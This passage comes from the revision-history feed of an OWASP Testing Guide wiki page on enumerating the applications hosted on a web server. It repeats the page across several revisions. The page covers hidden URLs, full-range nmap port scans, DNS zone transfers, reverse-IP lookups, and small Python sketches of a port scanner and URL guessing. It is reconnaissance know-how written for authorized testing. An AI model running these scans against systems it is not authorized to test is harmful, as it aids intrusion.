http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not even necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe for finding them. However, a few criteria can aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examine the results of the query “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from a URL such as https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to reveal this information to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] can perform service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap -P0 -sT -sV -p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or an indication of SSL-wrapped services (which should be probed to confirm that they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – in addition to what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited use, given that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services which allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtain pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to possibly refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11832</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11832"/>
				<updated>2006-11-06T09:02:49Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing the vulnerabilities of a web presence is finding out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications, in fact, have known vulnerabilities and known attack strategies that can be exploited to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a given web server without being referenced from the main website: this is true for internal and/or extranet websites, which may be misconfigured or not updated due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test, and no other knowledge. It is arguable that this setting is more typical of a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web server configured at this address&amp;quot; or a similar message. &lt;br /&gt;
Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all because you fail to notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following, we will examine a few techniques that can be employed to achieve this goal.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (in fact, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
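To illustrate the role of the ''Host:'' header, the following minimal Python sketch (with hypothetical host names taken from the example above) builds the raw HTTP/1.1 request that selects one of the virtual hosts behind a shared IP address:&lt;br /&gt;

```python
def http_request_for_vhost(hostname, path="/"):
    """Build a raw HTTP/1.1 GET request for `path` on virtual host `hostname`.

    Sending this same request to the same IP address with different Host
    values is what lets one server deliver the content of different sites.
    """
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {hostname}\r\n"
        f"Connection: close\r\n"
        "\r\n"
    )

# Both requests below could be sent to the same IP (e.g. 192.168.1.100),
# yet each addresses a different virtual host:
req_www = http_request_for_vhost("www.example.com")
req_helpdesk = http_request_for_vhost("helpdesk.example.com")
```

The server inspects the Host header and dispatches the request to the matching site configuration; without knowing the right names, the additional sites stay invisible.&lt;br /&gt;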
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no fool-proof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe for finding them. However, a few criteria can aid in the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could, for example, do a bit of googling using the ''site'' operator and examine the results of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a webmail front end might be accessible from a URL such as https://www.example.com/webmail even though it is not referenced anywhere (after all, employees would know where the webmail application is located, and there is no reason to advertise this information to outsiders on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
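The dictionary-style probing just described can be sketched as follows; the word list is a tiny illustrative sample, not a real dictionary:&lt;br /&gt;

```python
def candidate_urls(base, words=("webmail", "admin", "manager", "phpmyadmin")):
    """Generate likely locations of non-published applications under `base`.

    A real test would use a much larger dictionary, such as those bundled
    with vulnerability scanners, and then request each URL to see which
    ones respond with something other than a 404.
    """
    base = base.rstrip("/")
    return [f"{base}/{word}" for word in words]

urls = candidate_urls("https://www.example.com")
```

Each generated URL would then be requested, with anything other than an error response flagged for manual inspection.&lt;br /&gt;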
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap -P0 -sT -sV -p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or for indications of SSL-wrapped services (which should be probed to confirm that they are https).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – beyond what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
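The TCP connect scan performed by the nmap command above can be sketched in a few lines of Python; this is a bare-bones illustration only, with none of nmap's service fingerprinting (-sV) or timing logic:&lt;br /&gt;

```python
import socket

def find_open_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` on `host` that accept a TCP connection.

    Equivalent in spirit to nmap's -sT connect scan: a port is reported
    open if a full TCP connection to it succeeds.
    """
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connect() succeeded
                open_ports.append(port)
    return open_ports
```

Scanning all 65535 ports this way would be far slower than nmap, which parallelizes connections and can fall back to stealthier techniques; the sketch only conveys the principle.&lt;br /&gt;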
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited use, given the fact that zone transfer requests are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name server serving ''x.y.z.t''. In practice, matters get complicated because there could be several such servers. You may know a name server because it was given as part of the target to be assessed (say, ''dns.example.com''). You may query ''dns.example.com'' by means of tools such as ''nslookup'' or ''dig'' and, if you are lucky, get back a list of the DNS entries for the domain ''example.com''. This will include the obvious ''www.example.com'' as well as the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
If you don’t know a name server, you may look up the ''whois'' information for the given IP address, contact the name servers listed there, and request a zone transfer as described above.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name mappings, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
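The name actually queried in such an inverse lookup can be derived mechanically from the IP address; Python's standard ''ipaddress'' module shows the construction:&lt;br /&gt;

```python
import ipaddress

def ptr_query_name(ip):
    """Return the special domain name whose PTR record maps `ip` back to a
    symbolic name - the name that `dig -x` or `nslookup -type=PTR` queries
    under the hood.
    """
    return ipaddress.ip_address(ip).reverse_pointer

name = ptr_query_name("192.168.1.100")  # '100.1.168.192.in-addr.arpa'
```

The octets are reversed and the result placed under the ''in-addr.arpa'' zone; whether a PTR record exists there at all is up to whoever administers the address block.&lt;br /&gt;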
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services which allow you to perform name-based searches on DNS. One such service is ''Netcraft Search DNS'', available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or of applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11830</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11830"/>
				<updated>2006-11-06T08:58:56Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing the vulnerabilities of a web presence is finding out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications, in fact, have known vulnerabilities and known attack strategies that can be exploited to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a given web server without being referenced from the main website: this is true for internal and/or extranet websites, which may be misconfigured or not updated due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
